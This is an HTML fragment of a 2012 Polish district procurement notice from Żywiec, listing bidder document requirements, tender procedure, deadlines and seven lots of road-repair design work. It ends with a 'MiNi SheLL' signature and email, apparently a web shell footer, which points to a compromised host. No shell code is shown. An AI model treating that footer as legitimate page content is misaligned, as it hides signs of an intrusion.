<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	W celu potwierdzenia, iż wykonawca spełnia warunki udziału w postępowaniu wykonawca obowiązany jest przedłożyć : 
a)	Oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy (zał. Nr 2 do Specyfikacji), a także -- o ile wynika to ze złożonego oświadczenia - pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
b)	Oświadczenie o wykonaniu usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie niezbędnym do wykazania spełniania warunku określonego w pkt. IV.1.1) (zał. Nr 3 do Specyfikacji) 
3)	Pozostałe dokumenty które Wykonawca jest zobowiązany złożyć wraz z ofertą:
a)	Wypełniony Formularz ofertowy (zał. Nr 1 do Specyfikacji), zawierający m.in.: 
-	oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia wraz ze wszystkimi załącznikami i przyjęciu ich bez zastrzeżeń oraz o uznaniu się za związanymi określonymi w niej postanowieniami i zasadami postępowania, 
-	oświadczenie o przyjęciu:  terminu płatności i terminu związania ofertą 
-	oświadczenie o udzieleniu rękojmi na wykonany przedmiot zamówienia.
b)	W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wykonawców w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
c)	Pełnomocnictwo udzielane osobom podpisującym dokumenty ofertowe, o ile prawo do reprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych - postanowienie niniejsze stosuje się odpowiednio do reprezentowania wykonawcy powołanego i funkcjonującego na podstawie przepisów ustaw.
4)	Dokumenty, o których mowa wyżej, należy przedłożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę lub osobę upoważnioną do składania oświadczeń woli w imieniu wykonawcy, z tym że pełnomocnictwo udzielone osobie reprezentującej wykonawcę składane przez Wykonawcę powinno być złożone w oryginale lub kserokopii poświadczonej notarialnie. 
5)	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być udzielone przez wszystkich wykonawców wchodzących w skład  konsorcjum oraz zostać przedłożone w oryginale lub kserokopii poświadczonej notarialnie.
6)	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z §4 Rozporządzenie Prezesa Rady Ministrów z dnia 30.12.2009r. ( Dz.U 2009r. Nr 226 poz 1817) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane.
7)	W przypadku, gdy złożona przez wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości co do jej prawdziwości, zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.
8)	Dokumenty i oświadczenia sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski.
9)	W wypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) dokumenty, o których mowa w pkt. V SIWZ ppkt. 2 a - d) winny zostać przedłożone odrębnie w odniesieniu do każdego z wykonawców.
10)	Wykonawcy ubiegający się o udzielenie zamówienia w ramach spółki cywilnej dokumenty, o których mowa w pkt. V SIWZ ppkt. 2 c) i d)  winny zostać przedłożone odrębnie w odniesieniu do spółki cywilnej oraz odrębnie w odniesieniu do jej wspólników.
11)	W przypadku wykonawców wspólnie ubiegających się o zamówienie (konsorcjum, spółka cywilna), warunki wynikające z art. 22 ust. 1 pkt 1 ustawy muszą być spełnione oddzielnie przez każdego z wykonawców składających ofertę, natomiast warunki wynikające z art. 22 ust. 1 pkt 2 - 4 (warunki materialne lub warunki potwierdzające zdolność wykonawcy do wykonania przedmiotowego zamówienia) mogą być spełnione łącznie przez wszystkich wykonawców ubiegających się o udzielenie zamówienia. Złożone przez Wykonawców ubiegających się o zamówienie oświadczenia, o których mowa wyżej powinny potwierdzać spełnianie warunków wynikających z art. 22 ust. 1 pkt 1 - 4 Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zywiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żywcu
Wydział Rozwoju i Strategii
ul. Leśnianka 102a
34-300 Żywiec
pok. nr 24 - II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2012 godzina 08:00, miejsce: Starostwo Powiatowe w Żywcu
ul. Krasińskiego 13
34-300 Żywiec
parter - Biuro Informacji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane przez Fundusz Solidarności Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1474 S (ul. Komonieckiego i Moszczanicka) o długości 1000 mb od km 1+175 do km 2+175 w m. Żywiec Etap I (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1428 S Żywiec-Trzebinia-Juszczyna o długości 745 mb od km 0+325 do km 1+070 w m. Żywiec (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej Nr 1428 S Żywiec-Trzebinia-Juszczyna o długości 535 mb od km 4+325 do km 4+860 w m. Trzebinia (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej Nr 1428 S Żywiec-Trzebinia-Juszczyna o długości 445 mb od km 4+860 do km 5+305 w m. Juszczyna (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1425 S Wieprz-Juszczyna-Jeleśnia o długości 1400 mb od km 9+450 do km 10+205 i od km 10+405 do km 11+050 w m. Juszczyna (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej Nr 1425 S Wieprz-Juszczyna-Jeleśnia o długości 435 mb od km 1+425 do km 1+860 w m. Wieprz (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej Nr 1430 S Bystra-Juszczynka o długości 400 mb od km 0+000 do km 0+400 w m. Bystra (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ IV:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1415 S Pewel Mała-Pewel Ślemieńska-Ślemień o długości 1055 mb od km 8+360 do km 9+415 w m. Ślemień (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej nr 1415 S Pewel Mała-Pewel Ślemieńska-Ślemień o długości 520 mb od km 2+625 do km 3+145 w m. Pewel Mała (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej nr 1415 S Pewel Mała-Pewel Ślemieńska-Ślemień o długości 200 mb od km 6+705 do km 6+905 w m. Gilowice (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ V:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1450 S Kamesznica-Koniaków o długości 800 mb od km 3+360 do km 4+160 w m. Kamesznica (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej nr 1443 S Rycerka Górna-Przegibek o długości 300 mb od km 2+445 do km 2+745 w m. Rycerka Górna (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej nr 1444 S Rycerka Dolna-Rycerka Górna- Polana o długości 305 mb od km 10+630 do km 10+935 w m. Rycerka Górna(wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)


Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1434 S Węgierska Górka - Żabnica o długości 700 mb od km 6+440 do km 7+140 w m. Żabnica (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej nr 1437 S Milówka-Nieledwia o długości 700 mb od km 1+610 do km 2+310 w m. Nieledwia (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej nr 1458 S Radziechowy-Twardorzeczka o długości 205 mb od km 1+005 do km 1+210 w m. Twardorzeczka (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ VII:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1424 S Sopotnia Mała - Sopotnia Wielka o łącznej długości  4300 mb w km od 0+000 do km 7+620 w m. Sopotnia Wielka (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej nr 1417 S Jeleśnia - Pewel Wielka - Hucisko o długości 1900 mb od km 1+300 do 2+000  i od 2+900 do 4+100 w m. Pewel Wielka (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com